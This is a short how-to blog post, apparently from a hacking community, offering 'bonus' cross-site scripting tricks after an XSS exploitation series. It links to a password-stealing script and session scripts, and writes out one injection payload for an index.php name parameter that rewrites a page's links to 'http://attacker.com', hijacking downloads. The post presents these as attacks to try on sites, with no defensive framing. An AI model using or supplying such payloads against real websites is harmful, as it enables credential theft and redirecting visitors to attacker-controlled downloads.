How To: XSS Bonuses

XSS Bonuses

XSS Bonuses

This is a followup from my recent series on XSS exploitation, giving a few extra attacks/tricks to try.

Google's Prank

Google developed a JavaScript code (available here) that you can customize. Basically, it makes all the elements on the page swirl around, fade out to white, and pretends to hack you. Customize it to your own liking.

Password Stealer

Martani Fyssal, a Microsoft developer, created a JavaScript code that steals passwords. You can download it here.

Changing Download

Using this code, you can change the download reference for a website.

index.php?name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link0. href="http://attacker.com";}</script>

Just make sure you change the respective variables.
Credits to Ramesh Natarajan.

Persistent Connections

Again by Ramesh, these are two PHP scripts that create a persistent connection.

login.php

home.php

Change what you want.

Thanks

I'd like to thank the many people who help me study, from the members of C3, to the many pentesters online to take their time to share their knowledge. You guys help keep me going. Many thanks to Ramesh Natarajan for his amazing scripts and his wonderful sharing. And of course, thank you all for keeping this community alive.

C|H of C3

1 Comment

Excellent tutorial and resources!! Looking forward to more!

Share Your Thoughts

  • Hot
  • Latest